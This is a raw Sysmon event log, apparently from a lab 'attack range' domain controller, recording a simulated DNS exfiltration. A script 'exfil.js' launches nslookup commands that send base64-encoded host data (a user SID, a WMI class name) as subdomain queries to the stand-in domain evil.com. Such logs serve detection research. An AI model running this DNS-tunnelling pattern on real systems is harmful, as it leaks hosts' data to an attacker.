14:16:34.013{2E1864BB-17C1-629A-BF40-000000005F02}32124812C:\Windows\system32\cmd.exe{2E1864BB-17C2-629A-C140-000000005F02}660C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201193Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.013{2E1864BB-17C2-629A-C140-000000005F02}660C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAx evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C1-629A-BF40-000000005F02}3212C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAx evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvwen.tmp 2>&1 23542300x800000000000000043941Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:34.874{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3589D77F9BD931AA490E811F37F6C9ED,SHA256=2D4BCFA233CA573C0316BEFDAB2C872603F780273E3E7B089E1741E2BBAFD149,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000043940Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:34.656{0A5DF930-E35C-6299-1E00-000000006002}1996NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-05821ca64e01051b6\channels\health\respondent-20220603103302-217MD5=1368864ED3964BDCAF310770CE48D2A5,SHA256=F4EE2B140FD43EB5772AE1FE5CF5CF61204868E3BB74D3908306C7C1A703C3E0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000201641Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.976{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17C3-629A-F040-000000005F02}2520C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201640Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.976{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C3-629A-F040-000000005F02}2520C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201639Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.960{2E1864BB-17C3-629A-F040-000000005F02}25207656C:\Windows\system32\conhost.exe{2E1864BB-17C3-629A-EF40-000000005F02}732C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201638Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.945{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C3-629A-F040-000000005F02}2520C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201637Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.945{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201636Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.945{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201635Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.945{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201634Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.945{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201633Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.945{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C3-629A-EF40-000000005F02}732C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201632Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.945{2E1864BB-17A1-629A-783D-000000005F02}55527308C:\Windows\System32\WScript.exe{2E1864BB-17C3-629A-EF40-000000005F02}732C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201631Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.948{2E1864BB-17C3-629A-EF40-000000005F02}732C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A KioqV2luMzJfTmV0d29ya0FkYXB0ZXJDb25maWd1cmF0aW9uKioq evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlbabb.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000201630Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.929{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlvbqkuq.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000201629Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.891{2E1864BB-17C3-629A-ED40-000000005F02}58367748C:\Windows\system32\conhost.exe{2E1864BB-17C3-629A-EE40-000000005F02}4860C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201628Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.891{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201627Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.891{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201626Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.891{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201625Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.891{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201624Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.891{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C3-629A-EE40-000000005F02}4860C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201623Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.891{2E1864BB-17C3-629A-EC40-000000005F02}57366892C:\Windows\system32\cmd.exe{2E1864BB-17C3-629A-EE40-000000005F02}4860C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201622Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.897{2E1864BB-17C3-629A-EE40-000000005F02}4860C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C3-629A-EC40-000000005F02}5736C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvbqkuq.tmp 2>&1 10341000x8000000000000000201621Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.860{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17C3-629A-ED40-000000005F02}5836C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201620Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.860{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C3-629A-ED40-000000005F02}5836C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201619Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.860{2E1864BB-17C3-629A-ED40-000000005F02}58367748C:\Windows\system32\conhost.exe{2E1864BB-17C3-629A-EC40-000000005F02}5736C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201618Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.844{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C3-629A-ED40-000000005F02}5836C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201617Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.829{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201616Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.829{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201615Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.829{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201614Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.829{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201613Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 